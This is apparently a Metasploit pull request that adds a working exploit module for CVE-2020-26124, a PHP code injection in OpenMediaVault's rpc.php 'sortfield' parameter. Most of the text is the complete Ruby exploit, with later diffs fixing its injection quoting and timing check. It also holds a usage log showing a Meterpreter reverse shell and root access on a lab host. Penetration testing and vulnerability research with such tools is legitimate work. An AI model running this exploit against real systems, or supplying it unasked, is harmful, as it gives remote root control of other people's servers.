### PR TITLE
OpenMediaVault 5.5.11 Authenticated Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
+++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md
@@ -1,0 +1,95 @@
+## Vulnerable Application
+
+### Description
+
+  This module exploits an authenticated PHP code injection
+  vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 
+  inclusive in the "sortfield" POST parameter of "rpc.php" page, 
+  because json_encode_safe is not used in config/databasebackend.inc. 
+  Successful exploitation allows arbitrary command execution 
+  on the underlying operating system as root.
+
+
+### Installation And Setup
+
+  1. Download the version 5.5.11 of OpenMediaVault (i.e. [openmediavault_5.5.11-amd64.iso ISO](https://deac-ams.dl.sourceforge.net/project/openmediavault/5.5.11/openmediavault_5.5.11-amd64.iso)).
+  2. Set up a new Debian machine in VirtualBox or VMWare and load the ISO. 
+  Follow the install prompts and note the `root` password you choose to use. 
+  Once the installation is finished, press `<Enter>` to reboot the server.
+  3. Log into via the terminal using the username `root` and the password 
+  you set for the `root` user during installation.
+  4. On the shell and run the command `ip a` to get the current IP address.
+  5. Take the IP address and browse to the URL http://*IP ADDRESS*/, then log in
+  with the default administrative credentials (`admin`:`openmediavault`).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### OpenMediaVault 5.5.11
+```
+msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options
+
+Module options (exploit/unix/webapp/openmediavault_rpc_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  openmediavault   yes       Password to login with
+   HttpUsername  admin            yes       User to login with
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT         80               yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Linux Dropper)
+
+
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
+rhosts => 192.168.56.108
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
+lhost => 192.168.56.105
+msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.56.105:4444
+[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
+[+] 192.168.56.108:80 - Authenticated successfully.
+[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
+[*] 192.168.56.108:80 - Sending payload (150 bytes)...
+[*] Sending stage (976712 bytes) to 192.168.56.108
+[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : 192.168.56.108
+OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > shell
+Process 1499 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+```

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Payload' => { 'BadChars' => "\x00" },
-        'DisclosureDate' => 'Sept 28 2020',
+        'DisclosureDate' => 'Sep 28 2020',
         'Targets' =>
           [
             [

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Automatic (Unix In-Memory)',
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_ssh' },
               'Type' => :unix_memory
             ]
           ],

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
           \"id\":\"apt_history\",
           \"start\":0,
           \"limit\":50,
-          \"sortfield\":\"'.exec(#{cmd}).'\",
+          \"sortfield\":\"'.exec(\\\"#{cmd}\\\").'\",
           \"sortdir\":\"DESC\"
         },
         \"options\":null
@@ -169,18 +169,18 @@ class MetasploitModule < Msf::Exploit::Remote
         return CheckCode::Safe
       end
 
-      delay = rand(5...10)
-      cmd = "usleep(#{delay}0000)"
-      print_status("#{peer} - Verifying remote code execution by attempting to execute '#{cmd}'.")
+      delay = rand(7...15)
+      cmd = "\\\").usleep(#{delay}0000).(\\\""
+      print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
       t1 = Time.now.to_i
       res = execute_command(cmd)
       t2 = Time.now.to_i
       unless res
-        print_error("#{peer} - Connection failed whilst trying to perform the command injection.")
+        print_error("#{peer} - Connection failed whilst trying to perform the code injection.")
         return CheckCode::Detected
       end
       diff = t2 - t1
-      if diff >= delay
+      if diff >= 3
         print_good("#{peer} - Response received after #{diff} seconds.")
         return CheckCode::Vulnerable
       else
@@ -207,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
       case target['Type']
       when :unix_memory
-        execute_command(payload.encoded.gsub('"', '\"'))
+        execute_command(payload.encoded)
       when :linux_dropper
         execute_cmdstager(linemax: 130_000)
       end

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -11,13 +11,13 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         'Name' => 'OpenMediaVault rpc.php Authenticated PHP Code Injection',
-        'Description' => %q{.
+        'Description' => %q{
           This module exploits an authenticated PHP code injection
-          vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 
-          inclusive in the "sortfield" POST parameter of "rpc.php" page, 
-          because json_encode_safe is not used in config/databasebackend.inc. 
-          Successful exploitation allows arbitrary command execution 
-          on the underlying operating system as root. 
+          vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12
+          inclusive in the "sortfield" POST parameter of "rpc.php" page,
+          because json_encode_safe is not used in config/databasebackend.inc.
+          Successful exploitation allows arbitrary command execution
+          on the underlying operating system as root.
         },
         'Author' => [
           # Obrela Labs Team - Discovery and Metasploit module
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2020-26124'],
-          ['URL', 'https://www.openmediavault.org/?p=2797'] 
+          ['URL', 'https://www.openmediavault.org/?p=2797']
         ],
         'License' => MSF_LICENSE,
         'Platform' => ['unix', 'linux'],
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'uri' => @uri,
       'method' => 'POST',
-      'cookie' => "#{@cookie}",
+      'cookie' => @cookie.to_s,
       'data' => "{
         \"service\":\"System\",
         \"method\":\"getInformation\",
@@ -92,6 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
       return nil
     end
+
     return version
   end
 
@@ -117,6 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # specifically with their own unique error message.
       return nil
     end
+
     if res.code == 200
       print_good("#{peer} - Authenticated successfully.")
       @cookie = res.get_cookies
@@ -135,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'uri' => @uri,
       'method' => 'POST',
-      'cookie' => "#{@cookie}",
+      'cookie' => @cookie.to_s,
       'data' => "{
           \"service\":\"LogFile\",
           \"method\":\"getList\",
@@ -160,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Detected
     end
     if res.code == 200
-      version = get_target()
+      version = get_target
       if version.nil?
         # We don't print out an error message here as returning this will
         # automatically cause Metasploit to print out an appropriate error message.
@@ -197,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
     end
     if res.code == 200
-      version = get_target()
+      version = get_target
       if version.nil?
         print_error("#{peer} - The target is not vulnerable.")
         return false

--- a/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
+++ b/modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
@@ -1,0 +1,217 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenMediaVault rpc.php Authenticated PHP Code Injection',
+        'Description' => %q{.
+          This module exploits an authenticated PHP code injection
+          vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12 
+          inclusive in the "sortfield" POST parameter of "rpc.php" page, 
+          because json_encode_safe is not used in config/databasebackend.inc. 
+          Successful exploitation allows arbitrary command execution 
+          on the underlying operating system as root. 
+        },
+        'Author' => [
+          # Obrela Labs Team - Discovery and Metasploit module
+          'Anastasios Stasinopoulos (@ancst)'
+        ],
+        'References' => [
+          ['CVE', '2020-26124'],
+          ['URL', 'https://www.openmediavault.org/?p=2797'] 
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Payload' => { 'BadChars' => "\x00" },
+        'DisclosureDate' => 'Sept 28 2020',
+        'Targets' =>
+          [
+            [
+              'Automatic (Linux Dropper)',
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'openmediavault']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(_opts = {})
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => "#{@cookie}",
+      'data' => "{
+        \"service\":\"System\",
+        \"method\":\"getInformation\",
+        \"params\":null,
+        \"options\":{
+          \"updatelastaccess\":false
+        }
+      }"
+    })
+    version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+    if version.nil?
+      print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
+      return nil
+    end
+    print_good("#{peer} - OpenMediaVault version #{version} identified.")
+    if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
+      return nil
+    end
+    return version
+  end
+
+  def login(user, pass, _opts = {})
+    @uri = normalize_uri(target_uri.path, '/rpc.php')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'data' => "{
+        \"service\":\"Session\",
+        \"method\":\"login\",
+        \"params\":{
+          \"username\":\"#{user}\",
+          \"password\":\"#{pass}\"
+        },
+        \"options\":null
+      }",
+      'ctype' => 'application/json'
+    })
+    unless res
+      # We return nil here, as callers should handle this case
+      # specifically with their own unique error message.
+      return nil
+    end
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+      @cookie = res.get_cookies
+    elsif res.code == 401
+      print_error("#{peer} - Authentication failed.")
+    else
+      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
+    end
+    return res
+  rescue ::Rex::ConnectionError
+    print_error('Caught a Rex::ConnectionError in login() method. Connection failed.')
+    return nil
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => "#{@cookie}",
+      'data' => "{
+          \"service\":\"LogFile\",
+          \"method\":\"getList\",
+          \"params\":{
+          \"id\":\"apt_history\",
+          \"start\":0,
+          \"limit\":50,
+          \"sortfield\":\"'.exec(#{cmd}).'\",
+          \"sortdir\":\"DESC\"
+        },
+        \"options\":null
+      }"
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    unless res
+      print_error("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
+      return CheckCode::Detected
+    end
+    if res.code == 200
+      version = get_target()
+      if version.nil?
+        # We don't print out an error message here as returning this will
+        # automatically cause Metasploit to print out an appropriate error message.
+        return CheckCode::Safe
+      end
+
+      delay = rand(5...10)
+      cmd = "usleep(#{delay}0000)"
+      print_status("#{peer} - Verifying remote code execution by attempting to execute '#{cmd}'.")
+      t1 = Time.now.to_i
+      res = execute_command(cmd)
+      t2 = Time.now.to_i
+      unless res
+        print_error("#{peer} - Connection failed whilst trying to perform the command injection.")
+        return CheckCode::Detected
+      end
+      diff = t2 - t1
+      if diff >= delay
+        print_good("#{peer} - Response received after #{diff} seconds.")
+        return CheckCode::Vulnerable
+      else
+        print_error("#{peer} - Response wasn't received within the expected period of time.")
+        return CheckCode::Safe
+      end
+    end
+  rescue ::Rex::ConnectionError
+    print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
+    return CheckCode::Unknown
+  end
+
+  def exploit
+    res = login(user, pass)
+    unless res
+      print_error("No response was received from #{peer} whilst in exploit(), check it is online and the target port is open!")
+    end
+    if res.code == 200
+      version = get_target()
+      if version.nil?
+        print_error("#{peer} - The target is not vulnerable.")
+        return false
+      end
+      print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
+      case target['Type']
+      when :unix_memory
+        execute_command(payload.encoded.gsub('"', '\"'))
+      when :linux_dropper
+        execute_cmdstager(linemax: 130_000)
+      end
+    end
+  rescue ::Rex::ConnectionError
+    print_error('Rex::ConnectionError caught in check(), could not connect to the target.')
+    return false
+  end
+end


### PR DESCRIPTION
This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12  inclusive in the `sortfield` POST parameter of `rpc.php` page, because json_encode_safe is not used in config/databasebackend.inc. Successful exploitation allows arbitrary command execution on the underlying operating system as `root`.

**Usage Example**
```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  openmediavault   yes       Password to login with
   HttpUsername  admin            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
[+] 192.168.56.108:80 - Authenticated successfully.
[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : 192.168.56.108
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```